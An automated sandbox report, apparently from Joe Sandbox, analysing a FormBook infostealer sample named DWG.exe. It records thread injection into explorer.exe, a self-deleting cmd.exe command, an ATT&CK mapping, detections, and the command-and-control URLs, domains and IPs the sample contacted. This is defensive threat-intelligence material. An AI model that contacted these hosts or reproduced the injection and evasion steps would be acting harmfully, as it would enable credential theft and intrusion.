Thread APC queued: target process: C:\Windows\explorer.exe

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Users\user\Desktop\DWG.exe	Thread register set: target process: 3352
Source: C:\Windows\SysWOW64\svchost.exe	Thread register set: target process: 3352

Source: C:\Users\user\Desktop\DWG.exe	Process created: C:\Users\user\Desktop\DWG.exe C:\Users\user\Desktop\DWG.exe
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\DWG.exe'

Source: explorer.exe, 00000006.00000000.331932782.0000000000B68000.00000004.00000020.sdmp	Binary or memory string: Progman\Pr
Source: explorer.exe, 00000006.00000000.332159250.00000000011E0000.00000002.00020000.sdmp, svchost.exe, 0000000A.00000002.558006268.0000000005920000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000006.00000000.362308444.0000000005E10000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.558006268.0000000005920000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.332159250.00000000011E0000.00000002.00020000.sdmp, svchost.exe, 0000000A.00000002.558006268.0000000005920000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.332159250.00000000011E0000.00000002.00020000.sdmp, svchost.exe, 0000000A.00000002.558006268.0000000005920000.00000002.00020000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000006.00000000.365065099.0000000008778000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWndh

Source: C:\Users\user\Desktop\DWG.exe

Code function: 0_2_0043601C GetLocalTime,GetSystemTime,GetTimeZoneInformation,

Source: C:\Users\user\Desktop\DWG.exe

Code function: 0_2_0043601C GetLocalTime,GetSystemTime,GetTimeZoneInformation,

Source: C:\Users\user\Desktop\DWG.exe

Code function: 0_2_0044D2B5 GetVersion,GetProcessVersion,LoadCursorA,LoadCursorA,LoadCursorA,

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 5.2.DWG.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.DWG.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.DWG.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.DWG.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.329088160.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.556210414.0000000000A00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.378750031.00000000005C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.330081826.00000000007A6000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.556634388.0000000002E10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.378700564.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.348602608.000000000792F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.363695053.000000000792F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.329372667.0000000000401000.00000020.00020000.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 5.2.DWG.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.DWG.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.DWG.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.DWG.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.329088160.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.556210414.0000000000A00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.378750031.00000000005C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.330081826.00000000007A6000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.556634388.0000000002E10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.378700564.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.348602608.000000000792F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.363695053.000000000792F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.329372667.0000000000401000.00000020.00020000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\DWG.exe

Code function: 0_2_00411BFD VirtualProtect,glGenTextures,glBindTexture,glTexParameteri,glTexParameteri,glTexParameteri,glTexParameteri,glTexImage2D,glBindTexture,glBegin,glArrayElement,LineDDA,

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Native API1	Path Interception	Process Injection512	Virtualization/Sandbox Evasion2	Input Capture1	System Time Discovery2	Remote Services	Input Capture1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Shared Modules1	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection512	LSASS Memory	Security Software Discovery121	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Deobfuscate/Decode Files or Information1	Security Account Manager	Virtualization/Sandbox Evasion2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information3	NTDS	Process Discovery2	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	Application Window Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	File Deletion1	Cached Domain Credentials	Remote System Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	File and Directory Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery14	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
DWG.exe	50%	Virustotal		Browse
DWG.exe	38%	ReversingLabs	Win32.Trojan.Zusy
DWG.exe	100%	Avira	HEUR/AGEN.1136968
DWG.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
5.1.DWG.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.0.DWG.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1136968	Download File
5.2.DWG.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
10.2.svchost.exe.900000.1.unpack	100%	Avira	TR/Patched.Gen	Download File
0.1.DWG.exe.400000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
5.0.DWG.exe.400000.1.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
5.0.DWG.exe.400000.2.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
10.2.svchost.exe.3c3796c.4.unpack	100%	Avira	TR/Patched.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
mylyk.net	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.theravewizards.com/xzes/?YTspi8lX=hsby6OIEBt/ghsMVYLSyJdZ7YeDc2IcIgsMuos52TKAPvq+RR5iGDOsuf8zypfzdpc18&MnaP7J=3fjTHZDPJpAt	0%	Avira URL Cloud	safe
http://www.jntycy.com/xzes/?MnaP7J=3fjTHZDPJpAt&YTspi8lX=o99pRogLOIyRAntfhtpVZytcMadcCvcEAGz2+SNM9lt1Q6oIsfbH3zhNe5B/+1jhL6CE	0%	Avira URL Cloud	safe
www.elsist.online/xzes/	0%	Avira URL Cloud	safe
http://schemas.mi	0%	URL Reputation	safe
http://www.publiccoins.online/xzes/?MnaP7J=3fjTHZDPJpAt&YTspi8lX=VW6AQLcl+2136037Dei1g2cODa3ue2eSFsBods08HsyRy7QSHzNYTvvdstC8PYxoWiaB	0%	Avira URL Cloud	safe
http://www.thebrandstudiointernational.com/xzes/?YTspi8lX=hHkh8CC3aQWSbWc+haxkrlzKrETBoK7eA41q+CP6m5nHXq5sq3R+TUUaF/2E5Ug81ukz&MnaP7J=3fjTHZDPJpAt	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
mylyk.net	198.54.116.195	true	true	0%, Virustotal, Browse	unknown
parkingpage.namecheap.com	198.54.117.215	true	false		high
thebrandstudiointernational.com	5.157.87.204	true	true		unknown
publiccoins.online	198.187.31.159	true	true		unknown
www.jntycy.com	154.216.113.38	true	true		unknown
www.theravewizards.com	unknown	unknown	true		unknown
www.hcbg.online	unknown	unknown	true		unknown
www.knowsyourdream.com	unknown	unknown	true		unknown
www.thebrandstudiointernational.com	unknown	unknown	true		unknown
www.mylyk.net	unknown	unknown	true		unknown
www.publiccoins.online	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.theravewizards.com/xzes/?YTspi8lX=hsby6OIEBt/ghsMVYLSyJdZ7YeDc2IcIgsMuos52TKAPvq+RR5iGDOsuf8zypfzdpc18&MnaP7J=3fjTHZDPJpAt	true	Avira URL Cloud: safe	unknown
http://www.jntycy.com/xzes/?MnaP7J=3fjTHZDPJpAt&YTspi8lX=o99pRogLOIyRAntfhtpVZytcMadcCvcEAGz2+SNM9lt1Q6oIsfbH3zhNe5B/+1jhL6CE	true	Avira URL Cloud: safe	unknown
www.elsist.online/xzes/	true	Avira URL Cloud: safe	low
http://www.publiccoins.online/xzes/?MnaP7J=3fjTHZDPJpAt&YTspi8lX=VW6AQLcl+2136037Dei1g2cODa3ue2eSFsBods08HsyRy7QSHzNYTvvdstC8PYxoWiaB	true	Avira URL Cloud: safe	unknown
http://www.thebrandstudiointernational.com/xzes/?YTspi8lX=hHkh8CC3aQWSbWc+haxkrlzKrETBoK7eA41q+CP6m5nHXq5sq3R+TUUaF/2E5Ug81ukz&MnaP7J=3fjTHZDPJpAt	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://zz.bdstatic.com/linksubmit/push.js	svchost.exe, 0000000A.00000002.557764792.0000000003DB2000.00000004.00020000.sdmp	false		high
https://www.yourhosting.nl/parkeerpagina.html	svchost.exe, 0000000A.00000002.557764792.0000000003DB2000.00000004.00020000.sdmp	false		high
http://schemas.mi	explorer.exe, 00000006.00000000.367204188.000000000EEB1000.00000004.00000001.sdmp	false	URL Reputation: safe	unknown
http://push.zhanzhang.baidu.com/push.js	svchost.exe, 0000000A.00000002.557764792.0000000003DB2000.00000004.00020000.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
198.187.31.159	publiccoins.online	United States	22612	NAMECHEAP-NETUS	true
154.216.113.38	www.jntycy.com	Seychelles	132839	POWERLINE-AS-APPOWERLINEDATACENTERHK	true
198.54.117.215	parkingpage.namecheap.com	United States	22612	NAMECHEAP-NETUS	false
5.157.87.204	thebrandstudiointernational.com	Netherlands	48635	ASTRALUSNL	true

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	510733
Start date:	28.10.2021
Start time:	07:38:11
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 29s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	DWG.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	23
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@7/0@10/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 65% (good quality ratio 59.6%) Quality average: 72.1% Quality standard deviation: 31.3%
HCA Information:	Successful, ratio: 85% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.82.210.154, 173.222.108.226, 173.222.108.210, 20.54.110.249, 40.112.88.60, 40.91.112.76, 80.67.82.211, 80.67.82.235 Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, ctldl.windowsupdate.com, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, a767.dspw65.akamai.net, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, a1449.dscg2.akamai.net, arc.msn.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
198.187.31.159	DHL Shipment Notification 74683783.exe	Get hash	malicious	Browse	www.despachantemedeiros.digital/i6rd/?Y8=1bxX_L&k48hR8=oD4D3WBtzYo1qnPRU4xFACU8AEOn6ZKUJX42WoqGOohaqc1Klm4dkQagQXOcbxO0AuNj
	confirmation bancaire.xlsm	Get hash	malicious	Browse	abrakadamnasja.xyz/css/Jm.exe
	HSBC -- Wire Transfer copy.exe	Get hash	malicious	Browse	cameronznxbas.xyz/css/st.exe
	qkWaxZQ3dW.exe	Get hash	malicious	Browse	cameronznxbas.xyz/css/st.exe
	HPEE IMAGES-SPECIFICATION ORDER - Copy.xlsm	Get hash	malicious	Browse	cameronznxbas.xyz/css/st.exe
198.54.117.215	Payment Advice.exe	Get hash	malicious	Browse	www.swalayan.digital/i6rd/?5jQ=A6AdAx&W2MXD=93HbYkqhlgr3hIa7US827LxV1rVmh2fzufxww1YrXPJhXqBeF4zo1K/jxwKPrkIKYKuy
	payment advice0272110.exe	Get hash	malicious	Browse	www.lesbianrofsmo.xyz/anab/?CrQPabN=Hxy3RWVe69Cd7uohsVYEg0a3P3V/BArEGZWWXU9j8C4XG3zaWh17NoDyO0SzZtoKrMy6&_fQL6d=_Tb0RzfHQPihG
	Amended Order.xlsx	Get hash	malicious	Browse	www.usbgdt.com/upi8/?8p1ph=3UbDyqfm57lZRZ3h0rb1PNAqbmd7pBi1w5Vc7dibSIZzJ8oi4VLl/ITubhE1ReV/9McpbA==&gFQtn4=8pLLUjVPw6XD
	1.exe	Get hash	malicious	Browse	www.storiedpklnfo.xyz/cr35/?w0G=w6ATHTlpqz&Sj=R7uFhzm4gcxwYFTLKNpfOX8NH1TtMCM9jOrf3U7j71VMynR5kMeFj7P2GspnCIocjCkv
	F9ObnUc4ol.exe	Get hash	malicious	Browse	www.estudioamlegal.com/n58i/?V2JtX25=3sVI0/i2PyG3qUu4YTCUVrirDvoK3EI1NalLdVavy+6aj+oUnzTEerwQaaYisqIiJdwL&r0G4n8=4h-Li0
	QUOTATION.exe	Get hash	malicious	Browse	www.rjm226.com/d6pu/?y6Ah=E+oDRIxCy00LbbvBKWdFJBfE6OJ7C6i7pv3ziVqmlDcWx/nP77f/582lUnUjvWzaxdFqo3fvtw==&SD=Kn0PFhqhflm8
	TDCKZy88Av.exe	Get hash	malicious	Browse	www.narbaal.com/ef6c/?Y8hHaDY=Qfq1eVj3wcFFxzqVC6TNcABTYUkfKUx3lNvhXn0osFv9kGeC07OvFWGBvl2Js1jTOwhE&cTql2=VN6dXjmhbR4LNtZ
	Un81iJoK7J.exe	Get hash	malicious	Browse	www.growthabove.com/mexq/?1buhg=bdD4kHkGAKKARS2/MEaB/x1q3EjiCm0+FjMgd+v9P+tpp1aX/jd81LI1hNYmT9g5/78j&k6p=eN6tpho
	Cs3PcPy48f.msi	Get hash	malicious	Browse	www.dentureslenexa.com/fs3g/?2duD_V=5jLpSh&Nr=EvxTxkBKE/8KN4lE/0q+ZfOvMRN8EAws2Pchhx6z9xfjDddqEbBmmgVms/hUQamvUHB1
	KYTransactionServer.exe	Get hash	malicious	Browse	www.shtfinc.net/c8te/?_v3DpJ=4hoXJ0DHn0Nl5f&Hr=c4KXaeS6FUIM9Kkw5zq+LKxJtHGo+puYIzc+2WNcthS4RqO94x3yQg9DX6qTkjFSnzqd
	MIN8gr0eOj.exe	Get hash	malicious	Browse	www.diemcoin.one/pusp/?l0G=g0DTGJ5xhz3djJ&nnf=T0TgMD+6mn0DuMBmOzP3zXvuOjkt3/ENl7Tx/oMm/vomXqjYGAstOhThgpdXe/7E0j19
	NEW ORDER INQUIRY_Q091421.PDF.exe	Get hash	malicious	Browse	www.shuterestock.com/h5jc/?8pW=sHmAg5sqI9KQ6giaeL488tnzzkTJjyzeNMirB4cW9uUfC9OAP0nw0RzKpDngt1/tFv6F&1bE8p=8p04q8mHnH
	p83BktbXwe.exe	Get hash	malicious	Browse	www.narbaal.com/ef6c/?YFQLD6=Qfq1eVj3wcFFxzqVC6TNcABTYUkfKUx3lNvhXn0osFv9kGeC07OvFWGBvmagv1frHTUSCXVL+Q==&TN6=m6pTon
	RFQ453266433,pdf.exe	Get hash	malicious	Browse	www.socw.quest/dhua/?3ffh2ZO=XFJc1d+jHKZ2Ha3XF2pE/YK3hsm0H6SvQpEs8n+iI9sUFAN8uD9sSzhfglXAjmxyVYQA&UL=7nl0dra
	INVOICE.exe	Get hash	malicious	Browse	www.cockevodka.com/avqp/?LVl4iT=JN6HZxgh3h&nVw=j6FgMNUKQV6/m21MJvb0Ahqoc0m5WXE/0aHxV1wTX7IDWaC9PVxVO6/rPmm34gnoEjQs
	qFghuPTDuw.exe	Get hash	malicious	Browse	www.theadamcook.com/heth/?j48D=mDHPtfePwBFdPz&ZL3DB4=NDMUETaAEYpdEScjys5sfqa6oGQbzTI6bu3Tns5CefClzmXnigQog1+lgVVQ3ZRuGxjS/TCtDg==
	RFQ9003930 New Order.doc	Get hash	malicious	Browse	www.ceasa.club/hht8/?3f_l=DUjZaEEJGHk2mIYyRTWCDvfPYGXyJA+p9CnlV/1lDuzycvHeDg3jgt8DWF0RM29KScOphA==&e6-0=cZQH7dS
	DHL_Sender_Documents_Details_021230900.xlsx	Get hash	malicious	Browse	www.why5mkt.com/m0np/?yPYP=KzrHnBoXSh&rN=pd8cLhyOD3Lvxu11EJvjnZnH7gmMmwGj/LLxrvXSZ/i0D2RlpnhF/0V5Vat1PcQ79Dzd8Q==
	85fX3YfW9S.exe	Get hash	malicious	Browse	www.roamingtrysha.com/hosg/?jBZ=1hNtiMcbd7AV+Zxw6jfXRht5026Vx3qKPd04RWegYVvuIjBVGyS0SVYMe04Jcmf/ypJkLnFPJw==&7n3=NFNTfdm8IF
	sprogr.exe	Get hash	malicious	Browse	www.kingofearth.love/myec/?LN689n=gh_TCpB&TBZh=7FWPYjaftzZ9H+gOW7161VQo7iIc+pdumeJhNdLHyulg3WNK/ncUHy14UGVnTYt1iuwi

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
parkingpage.namecheap.com	Betalingskvittering.exe	Get hash	malicious	Browse	198.54.117.217
	Payment Advice.exe	Get hash	malicious	Browse	198.54.117.215
	payment advice0272110.exe	Get hash	malicious	Browse	198.54.117.215
	DHL.exe	Get hash	malicious	Browse	198.54.117.212
	Order of CB-15GL PO530_pdf.exe	Get hash	malicious	Browse	198.54.117.212
	RFQ_PI02102110.exe	Get hash	malicious	Browse	198.54.117.216
	cNOilTxTR3.exe	Get hash	malicious	Browse	198.54.117.218
	lCFjxhAqu3.exe	Get hash	malicious	Browse	198.54.117.212
	Amended Order.xlsx	Get hash	malicious	Browse	198.54.117.215
	OS-QTN-0320-21-Rev1.exe	Get hash	malicious	Browse	198.54.117.210
	1.exe	Get hash	malicious	Browse	198.54.117.215
	DRAFT CONTRACT 0000499000-1100928777-pdf.exe	Get hash	malicious	Browse	198.54.117.211
	U8NUCQkg3s.exe	Get hash	malicious	Browse	198.54.117.218
	#U041a#U0430#U0441#U043e#U0432#U0430 #U0431#U0435#U043b#U0435#U0436#U043a#U0430.exe	Get hash	malicious	Browse	198.54.117.216
	triage_dropped_file.exe	Get hash	malicious	Browse	198.54.117.212
	2500010PO.excel.exe	Get hash	malicious	Browse	198.54.117.216
	MAERSK LINE SHIPPING DOCUMENT_pdf.exe	Get hash	malicious	Browse	198.54.117.212
	triage_dropped_file.exe	Get hash	malicious	Browse	198.54.117.212
	F9ObnUc4ol.exe	Get hash	malicious	Browse	198.54.117.211
	notification@dhl.com,pdf.exe	Get hash	malicious	Browse	198.54.117.217

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
NAMECHEAP-NETUS	PROFORMA INVOICE.exe	Get hash	malicious	Browse	199.188.205.66
	MT103-Advance.Payment.exe	Get hash	malicious	Browse	198.54.122.60
	Betalingskvittering.exe	Get hash	malicious	Browse	198.54.117.217
	10272021-AM65Application.HTM	Get hash	malicious	Browse	104.219.248.99
	Payment Advice.exe	Get hash	malicious	Browse	198.54.117.215
	Tfwyelel3H.exe	Get hash	malicious	Browse	192.64.119.254
	QQIksbWrVl.exe	Get hash	malicious	Browse	63.250.40.204
	SKGCM_YAHYA AZHEBS#U0130 Ponuda proizvoda7.exe	Get hash	malicious	Browse	198.54.126.156
	DUT2Aj4C2x.exe	Get hash	malicious	Browse	185.61.153.108
	Swift Payment Notification.xlsx	Get hash	malicious	Browse	63.250.40.204
	MT103USD.xlsx	Get hash	malicious	Browse	63.250.40.204
	DHL_document11022020680908911.exe	Get hash	malicious	Browse	198.54.114.114
	payment advice0272110.exe	Get hash	malicious	Browse	198.54.117.215
	R0ptlo2GB2.exe	Get hash	malicious	Browse	63.250.40.204
	QRT#U00a0(20211027#00001)#U00a0ACSAM-6000RC Quote.exe	Get hash	malicious	Browse	63.250.40.204
	Order.exe	Get hash	malicious	Browse	192.64.119.74
	PNkEr1lc2k.exe	Get hash	malicious	Browse	63.250.40.204
	Enquiry docs_001.exe	Get hash	malicious	Browse	63.250.40.204
	PO 211027-031A.exe	Get hash	malicious	Browse	63.250.40.204
	PO_SBK4128332S.exe	Get hash	malicious	Browse	198.54.114.114
POWERLINE-AS-APPOWERLINEDATACENTERHK	dhl.exe	Get hash	malicious	Browse	156.242.205.175
	Order Requiremnt-Oct-2021.exe	Get hash	malicious	Browse	154.215.87.120
	2500010PO.excel.exe	Get hash	malicious	Browse	154.215.95.146
	apep.arm	Get hash	malicious	Browse	154.216.35.210
	yOtRXukeq9	Get hash	malicious	Browse	154.203.73.148
	Shipping_Doc190dk0lwt837.exe	Get hash	malicious	Browse	154.216.110.154
	Order 0091.exe	Get hash	malicious	Browse	154.201.193.247
	fzkfNBkz1C	Get hash	malicious	Browse	154.93.111.235
	FWsCarsq8Q	Get hash	malicious	Browse	156.242.206.33
	buiodawbdawbuiopdw.x86	Get hash	malicious	Browse	156.244.139.182
	x86	Get hash	malicious	Browse	156.242.206.59
	7qvn4qlmi3	Get hash	malicious	Browse	156.251.7.162
	GRPVtMlbK5	Get hash	malicious	Browse	156.242.206.39
	AWB##29721.PDF.exe	Get hash	malicious	Browse	156.242.202.179
	UNNEIaOxVM	Get hash	malicious	Browse	160.124.155.159
	arm7.light	Get hash	malicious	Browse	156.242.206.27
	UniRHdW5VC	Get hash	malicious	Browse	156.251.7.176
	KEgx4lC3Ni	Get hash	malicious	Browse	156.243.251.0
	x86	Get hash	malicious	Browse	156.244.234.124
	x86	Get hash	malicious	Browse	156.244.234.124

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.157238812032227
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	DWG.exe
File size:	626688
MD5:	ff882802d113ed02fa070c496f89d797
SHA1:	aad1eed1c53f1d33ab52e13442b036bfeee91f1b
SHA256:	4216ff4fa7533209a6e50c6f05c5216b8afb456e6a3ab6b65ed9fcbdbd275096
SHA512:	9785432a34fdb1132ddd8185fa2fdfae4db726be0bc14995a67520f10ad3fab4f2ce9c3a311c6e3c5163b3bde67942af6e4c75216914577eb3e47a17bb102512
SSDEEP:	12288:N7MTwrEg4nkEo2sH2yefktZkgHAyRsrGGFJr23+sejpAmiL:lMTwrEgskEorogHA0slrsfejc
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qE^$5$0w5$0w5$0wN8<w4$0wc;#w.$0w5$0w.$0w.8>w.$0w.;:w.$0w5$1w.%0wW;#w $0w."6w4$0w.;;wj$0wRich5$0w........................PE..L..

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x4367cb
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x5846A1B8 [Tue Dec 6 11:32:08 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	c4824f327856ec0705e7797356a7405e

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 00460F30h
push 0043B828h
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 58h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
call dword ptr [004511ACh]
xor edx, edx
mov dl, ah
mov dword ptr [00471604h], edx
mov ecx, eax
and ecx, 000000FFh
mov dword ptr [00471600h], ecx
shl ecx, 08h
add ecx, edx
mov dword ptr [004715FCh], ecx
shr eax, 10h
mov dword ptr [004715F8h], eax
push 00000001h
call 00007FC6445A8F68h
pop ecx
test eax, eax
jne 00007FC6445A678Ah
push 0000001Ch
call 00007FC6445A6848h
pop ecx
call 00007FC6445A84B6h
test eax, eax
jne 00007FC6445A678Ah
push 00000010h
call 00007FC6445A6837h
pop ecx
xor esi, esi
mov dword ptr [ebp-04h], esi
call 00007FC6445AB597h
call dword ptr [004510ECh]
mov dword ptr [00472D18h], eax
call 00007FC6445AB455h
mov dword ptr [004715E8h], eax
call 00007FC6445AB1FEh
call 00007FC6445AB140h
call 00007FC6445A73AEh
mov dword ptr [ebp-30h], esi
lea eax, dword ptr [ebp-5Ch]
push eax
